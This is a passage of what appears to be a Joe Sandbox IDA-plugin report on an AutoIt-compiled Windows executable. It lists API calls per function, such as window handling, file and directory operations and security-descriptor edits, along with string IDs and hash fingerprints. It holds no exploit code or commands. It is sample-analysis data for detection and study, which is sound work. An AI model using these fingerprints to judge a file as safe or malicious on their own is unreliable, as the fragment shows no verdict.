                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                  • Opcode ID: 786b72a95816dfa177cedfaee0f2f4a683ebe37264518c019774173b0194226d
                                                                                                                  • Instruction ID: e3fafed24d2d0c21f597f9403515dad0598d544d85faac61576700e11df36ef9
                                                                                                                  • Opcode Fuzzy Hash: 786b72a95816dfa177cedfaee0f2f4a683ebe37264518c019774173b0194226d
                                                                                                                  • Instruction Fuzzy Hash: E3A173702543019FCB14EF14C951A6A77A6FF85364F18886EB896AB3D2DB30EC05CBB1
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00DAE6E1
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE6F2
                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00DAE71A
                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00DAE737
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE755
                                                                                                                  • _wcsstr.LIBCMT ref: 00DAE766
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00DAE79E
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE7AE
                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00DAE7D5
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00DAE81E
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE82E
                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00DAE856
                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00DAE8BF
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                  • Opcode ID: 68edbb949f54c85bc940da013c4450e2d737f3eace2f6ac06691512cbf69c27d
                                                                                                                  • Instruction ID: 1a76094d641794cc6b846247a52afff06531d3dce769c10926d16c93b2bbb991
                                                                                                                  • Opcode Fuzzy Hash: 68edbb949f54c85bc940da013c4450e2d737f3eace2f6ac06691512cbf69c27d
                                                                                                                  • Instruction Fuzzy Hash: D081A0310043099BDB05DF24C881FAA7BE9FF85314F18856AFD899A096EB34DD45CBB1
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                  • Opcode ID: 1702355ed6f70e9baf2b80e5a21d369c45e2220ef060408152ea18a8a9664d08
                                                                                                                  • Instruction ID: 203680cf89fe117028a865ce6418f4b81704d2f9d167f958ef9f118b5894fdc3
                                                                                                                  • Opcode Fuzzy Hash: 1702355ed6f70e9baf2b80e5a21d369c45e2220ef060408152ea18a8a9664d08
                                                                                                                  • Instruction Fuzzy Hash: 55319031A4831AB6DB14FB60ED13EAEB3A59F22714F204928F645710D5FFA1AF04C671
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00DAF8AB
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DAF8BD
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00DAF8D4
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00DAF8E9
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00DAF8EF
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00DAF8FF
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00DAF905
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DAF926
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DAF940
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DAF949
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00DAF9B4
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DAF9BA
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DAF9C1
                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00DAFA0D
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00DAFA1A
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00DAFA3F
                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DAFA6A
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3869813825-0
                                                                                                                  • Opcode ID: 778bc570ddb06779a957c74fe137caa02c6c907efc9a9c455faf9b3d1c9ea64c
                                                                                                                  • Instruction ID: 17d9a510c0a664bb9148c453bb0e40426ab5d59501ef07dc314acef36f663995
                                                                                                                  • Opcode Fuzzy Hash: 778bc570ddb06779a957c74fe137caa02c6c907efc9a9c455faf9b3d1c9ea64c
                                                                                                                  • Instruction Fuzzy Hash: AC513A71900709AFDB209FA8CD89B6FBBB6FF05705F044968E596E26A0C774A944CF60
                                                                                                                  APIs
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC026A
                                                                                                                  • _wcschr.LIBCMT ref: 00DC0278
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC028F
                                                                                                                  • _wcscat.LIBCMT ref: 00DC029E
                                                                                                                  • _wcscat.LIBCMT ref: 00DC02BC
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC02DD
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DC03BA
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC03DF
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC03F1
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC0406
                                                                                                                  • _wcscat.LIBCMT ref: 00DC041B
                                                                                                                  • _wcscat.LIBCMT ref: 00DC042D
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0442
                                                                                                                    • Part of subcall function 00DBC890: _wcscmp.LIBCMT ref: 00DBC92A
                                                                                                                    • Part of subcall function 00DBC890: __wsplitpath.LIBCMT ref: 00DBC96F
                                                                                                                    • Part of subcall function 00DBC890: _wcscpy.LIBCMT ref: 00DBC982
                                                                                                                    • Part of subcall function 00DBC890: _wcscat.LIBCMT ref: 00DBC995
                                                                                                                    • Part of subcall function 00DBC890: __wsplitpath.LIBCMT ref: 00DBC9BA
                                                                                                                    • Part of subcall function 00DBC890: _wcscat.LIBCMT ref: 00DBC9D0
                                                                                                                    • Part of subcall function 00DBC890: _wcscat.LIBCMT ref: 00DBC9E3
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                  • API String ID: 2955681530-2806939583
                                                                                                                  • Opcode ID: 2dc9228119f5f761b5dacbe42e6d179be758a8f4fa8799268eb1240e788e04a9
                                                                                                                  • Instruction ID: 563296a9f19a1f66c491ad8df03010f5e1647b6d2ecd8922c70f58cb74334d21
                                                                                                                  • Opcode Fuzzy Hash: 2dc9228119f5f761b5dacbe42e6d179be758a8f4fa8799268eb1240e788e04a9
                                                                                                                  • Instruction Fuzzy Hash: 0D91B171504302AFCB20EB60C855F9BB7E8EF88310F04895DF5599B291EB34EA44CB72
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DDCD0B
                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00DDCD83
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DDCE04
                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DDCE26
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DDCE35
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DDCE52
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00DDCE85
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DDCEA4
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DDCEB9
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DDCEC0
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DDCED2
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DDCEEA
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                  • Opcode ID: 7f52a55d979ebfec1d1fdea763b4e77850a32eddd638c36a42924412314d96f1
                                                                                                                  • Instruction ID: 1a36ce186b6c036da769a585f5e911efe0a0dfff84b74b0cd983fc785289200a
                                                                                                                  • Opcode Fuzzy Hash: 7f52a55d979ebfec1d1fdea763b4e77850a32eddd638c36a42924412314d96f1
                                                                                                                  • Instruction Fuzzy Hash: 5A718AB115430AAFD725CF28CC45FAA7BE6EB88704F48451DF985973A1D770E805CB25
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00DBB46D
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00DBB476
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DBB482
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DBB561
                                                                                                                  • __swprintf.LIBCMT ref: 00DBB591
                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00DBB5BD
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DBB63F
                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 00DBB6D1
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DBB727
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DBB736
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00DBB772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                  • Opcode ID: 4e21d147a6c4a59a1d637ba35142723abfbd1cf84dd37510a6f6af8320a65308
                                                                                                                  • Instruction ID: 4de8a8e2f94cd523de7d0686548c5d4ec53a71b199d75b7a25634f1f982ba336
                                                                                                                  • Opcode Fuzzy Hash: 4e21d147a6c4a59a1d637ba35142723abfbd1cf84dd37510a6f6af8320a65308
                                                                                                                  • Instruction Fuzzy Hash: F9C1E071A00615EFCB109F65D884BB9B7B5FF45320F188466E486EB682DBB4EC40DBB1
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00DD6FF9
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DD7044
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                  • Opcode ID: bc8716185e3a5399c8ae55811577faa5f502d3164e34314e796dca6a3ad0a943
                                                                                                                  • Instruction ID: dcd8d16ed3b3572b40746ac235612a0675d5df0dbcce091f8c03c8104a527d4a
                                                                                                                  • Opcode Fuzzy Hash: bc8716185e3a5399c8ae55811577faa5f502d3164e34314e796dca6a3ad0a943
                                                                                                                  • Instruction Fuzzy Hash: 929194742087019FCB14EF14C851A6DB7A2EF94354F04889DF8966B792EB31ED06CB72
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DDE3BB
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DDBCBF), ref: 00DDE417
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DDE457
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DDE49C
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DDE4D3
                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00DDBCBF), ref: 00DDE4DF
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DDE4EF
                                                                                                                  • DestroyCursor.USER32(?), ref: 00DDE4FE
                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DDE51B
                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DDE527
                                                                                                                    • Part of subcall function 00D91BC7: __wcsicmp_l.LIBCMT ref: 00D91C50
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                  • Opcode ID: bf5db6533338f80d67fb17623c9f37366ddc9b27856286ed4ed4abfb306f0734
                                                                                                                  • Instruction ID: 285df566f7817b13d84e03a840c4393e8f2bc99fd2895d50fcde57fd0d01e7c5
                                                                                                                  • Opcode Fuzzy Hash: bf5db6533338f80d67fb17623c9f37366ddc9b27856286ed4ed4abfb306f0734
                                                                                                                  • Instruction Fuzzy Hash: AB61CE71540219BEEB14EF64DC46FBE7BA9EB08714F108206F915EA2D0EB74D980D7B0
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00DC0EFF
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DC0F0F
                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DC0F1B
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DC0F79
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0F91
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0FA3
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DC0FB8
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0FCC
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0FFE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC101F
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC102B
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC106A
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                  • Opcode ID: c1a9c196d19ab2b94228bf95e9b6c7809385235d41694fb1bb6aca4604791c0a
                                                                                                                  • Instruction ID: 1be86729368942b392d6b10a182b1ebff9ba8bf2d24dfaa4ae8eda8586c1fc01
                                                                                                                  • Opcode Fuzzy Hash: c1a9c196d19ab2b94228bf95e9b6c7809385235d41694fb1bb6aca4604791c0a
                                                                                                                  • Instruction Fuzzy Hash: 65615EB5504306AFC710EF64C845E9AB7E9FF89310F04891EF98987251EB31E945CBB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00DBDB26
                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00DBDB73
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBDBBB
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBDBF2
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBDC20
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                  • Opcode ID: 95587d882ea1b7feeeefd276c0fa787d510f5c15244c11a1d8c5d7056795d0ff
                                                                                                                  • Instruction ID: b1c435f177fd385e14350fedd257f8ac57024588b51fae54bec2a489a80dfd26
                                                                                                                  • Opcode Fuzzy Hash: 95587d882ea1b7feeeefd276c0fa787d510f5c15244c11a1d8c5d7056795d0ff
                                                                                                                  • Instruction Fuzzy Hash: FB513A711043059FC700EF20D88296AB7F5EF88718F14886DF89AA7261EB71EE05CF62
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DE4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00DB3145
                                                                                                                  • LoadStringW.USER32(00000000,?,00DE4085,00000016), ref: 00DB314E
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00DE4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00DB3170
                                                                                                                  • LoadStringW.USER32(00000000,?,00DE4085,00000016), ref: 00DB3173
                                                                                                                  • __swprintf.LIBCMT ref: 00DB31B3
                                                                                                                  • __swprintf.LIBCMT ref: 00DB31C5
                                                                                                                  • _wprintf.LIBCMT ref: 00DB326C
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DB3283
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                  • API String ID: 984253442-2268648507
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00DBD96C
                                                                                                                  • __swprintf.LIBCMT ref: 00DBD98E
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DBD9CB
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DBD9F0
                                                                                                                  • _memset.LIBCMT ref: 00DBDA0F
                                                                                                                  • _wcsncpy.LIBCMT ref: 00DBDA4B
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00DBDA80
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DBDA8B
                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00DBDA94
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DBDA9E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DDBD04,?,?), ref: 00DDE564
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE57B
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE586
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE593
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DDE59C
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE5AB
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DDE5B4
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE5BB
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DDE5CC
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DFD9BC,?), ref: 00DDE5E5
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00DDE5F5
                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00DDE619
                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00DDE644
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DDE66C
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DDE682
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3840717409-0
                                                                                                                  APIs
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DC0C93
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0CAB
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0CBD
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DC0CD2
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0CE6
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00DC0CFE
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DC0D18
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0D2A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DAB903
                                                                                                                    • Part of subcall function 00DAB8E7: GetLastError.KERNEL32(?,00DAB3CB,?,?,?), ref: 00DAB90D
                                                                                                                    • Part of subcall function 00DAB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DAB3CB,?,?,?), ref: 00DAB91C
                                                                                                                    • Part of subcall function 00DAB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DAB3CB), ref: 00DAB923
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DAB93A
                                                                                                                    • Part of subcall function 00DAB982: GetProcessHeap.KERNEL32(00000008,00DAB3E1,00000000,00000000,?,00DAB3E1,?), ref: 00DAB98E
                                                                                                                    • Part of subcall function 00DAB982: RtlAllocateHeap.NTDLL(00000000,?,00DAB3E1), ref: 00DAB995
                                                                                                                    • Part of subcall function 00DAB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DAB3E1,?), ref: 00DAB9A6
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DAB5F7
                                                                                                                  • _memset.LIBCMT ref: 00DAB60C
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DAB62B
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB63C
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00DAB679
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DAB695
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB6B2
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DAB6C1
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00DAB6C8
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DAB6E9
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00DAB6F0
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DAB721
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DAB747
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DAB75B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00DCA2DD
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DCA2E9
                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00DCA2F5
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00DCA302
                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DCA356
                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00DCA392
                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DCA3B6
                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00DCA3BE
                                                                                                                  • DeleteObject.GDI32(?), ref: 00DCA3C7
                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00DCA3CE
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00DCA3D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
